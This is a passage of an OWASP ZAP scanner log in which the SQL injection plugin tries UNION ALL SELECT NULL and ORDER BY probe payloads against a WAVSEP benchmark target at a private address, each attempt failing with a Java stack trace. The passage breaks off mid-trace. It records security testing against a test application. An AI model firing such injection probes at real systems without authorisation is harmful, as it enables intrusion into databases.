org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679937 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679938 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679939 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679940 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679941 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679941 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679942 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679943 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679944 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679945 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679946 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 2421-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 2421-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679947 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 